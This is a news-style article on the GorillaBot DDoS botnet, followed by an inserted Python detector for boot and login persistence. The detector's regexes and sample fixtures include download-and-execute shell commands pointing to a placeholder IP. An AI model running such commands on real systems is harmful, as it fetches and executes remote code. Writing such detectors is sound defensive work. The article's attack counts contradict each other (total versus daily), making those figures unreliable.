GorillaBot Dominates DDoS Attacks with Over 300,000 Commands

The Gorilla Botnet, a newly discovered cyber threat, has been making waves in the cybersecurity world with its unprecedented activity. Between September 4 and 27, the botnet launched over 300,000 DDoS attacks targeting victims in more than 100 countries. This level of aggression and scope of attacks have raised alarm bells among security experts globally.

This sophisticated botnet, which is a modified version of the infamous Mirai malware, has evolved to support multiple CPU architectures. It utilizes advanced techniques to maintain control over infected devices for extended periods. One of its key features is the use of encryption algorithms commonly associated with the KekSec hacker group. This demonstrates a high level of sophistication and a strong ability to avoid detection.

The targets of the Gorilla Botnet have primarily been critical infrastructure sectors such as universities, government websites, telecoms, and banks. These sectors play a crucial role in a country’s functioning, and any disruption to their operations can have far-reaching consequences. The sheer scale and precision of these attacks highlight the botnet’s potential to cause significant disruptions and damage.

In a significant campaign in September 2024, the Gorilla Botnet unleashed over 300,000 attack commands daily, targeting victims across 113 countries. Its preferred method of attack was the UDP Flood, a technique that exploits the connectionless nature of the UDP protocol to flood victims with traffic. Countries like China, the United States, Canada, and Germany were hit particularly hard by these attacks, underscoring the global nature of the threat.

The GorillaBot trojan, a variant of the Mirai family, boasts a wide array of DDoS attack methods, including UDP, TCP, GRE, and specialized attacks targeting specific protocols like OpenVPN, Discord, and FiveM. The botnet’s use of encryption algorithms favored by the KekSec group raises suspicions of a potential connection between the two. The presence of certain code signatures further fuels speculation about the botnet’s origin and motives.

To ensure its persistence, the Gorilla Botnet exploits vulnerabilities in systems like Hadoop YARN RPC, which grants it high privileges. It deploys various tactics to evade detection, including creating a service file for automatic startup and downloading malicious scripts at system boot or user login. The botnet is also adept at identifying and avoiding honeypots, adding another layer of complexity to the threat it poses.
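A defender-side check for the persistence described above, as an added example (not code from the original article or from any analysis of the botnet): it flags systemd unit files and boot or login scripts whose commands download a script and then run it. The file locations, the list of download tools and the sample file contents are assumptions constructed for illustration.

```python
import glob
import re

# Places Linux reads at boot or login (common defaults; an assumption, adjust per distro).
STARTUP_GLOBS = ["/etc/systemd/system/*.service", "/etc/profile",
                 "/etc/profile.d/*.sh", "/etc/rc.local", "/etc/inittab"]

EXEC_DIRECTIVE = re.compile(r"Exec\w+\s*=\s*(.*)")       # ExecStart=, ExecStartPre=, ...
FETCH = re.compile(r"\b(?:curl|wget|tftp|ftpget)\b")     # network download tools
# Downloaded content handed to a shell: piped in, or chained via ; / && to sh, chmod or ./file
RUN = re.compile(r"\|\s*(?:/bin/)?(?:ba|da|a)?sh\b"
                 r"|(?:&&|;)\s*(?:(?:/bin/)?(?:ba|da|a)?sh\b|chmod\b|\./)")


def suspicious_lines(name, text):
    """Return [(line_no, line)] for lines that download and then execute something."""
    hits = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue                      # blank line or comment
        cmd = line
        if name.endswith(".service"):     # in unit files only Exec* directives run commands
            m = EXEC_DIRECTIVE.match(line)
            if not m:
                continue
            cmd = m.group(1)
        if FETCH.search(cmd) and RUN.search(cmd):
            hits.append((no, line))
    return hits


# Constructed samples (not taken from any real infection); 198.51.100.7 is a documentation address.
SAMPLE_UNIT = """[Unit]
Description=wget mirror helper | sh
[Service]
ExecStart=/bin/sh -c "wget -qO- http://198.51.100.7/boot.sh | sh"
[Install]
WantedBy=multi-user.target
"""
SAMPLE_PROFILE = """# curl https://example.org/install.sh | sh
export PATH=$PATH:/usr/local/bin
alias dl='curl -O'
curl -s http://198.51.100.7/login.sh -o /tmp/.l; chmod +x /tmp/.l; /tmp/.l
"""

if __name__ == "__main__":
    for path in (p for g in STARTUP_GLOBS for p in glob.glob(g)):
        with open(path, errors="replace") as fh:
            for no, line in suspicious_lines(path, fh.read()):
                print(f"{path}:{no}: {line}")
```

Run as a script, it scans the listed startup locations on the local host; a hit is a lead for manual review, since legitimate installers sometimes use the same download-and-run pattern.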

Overall, the emergence of the Gorilla Botnet represents a significant challenge for cybersecurity professionals worldwide. Its advanced capabilities, global reach, and potential connections to known hacker groups make it a formidable adversary. As security experts work tirelessly to analyze and mitigate this threat, the need for robust cybersecurity measures has never been more critical.
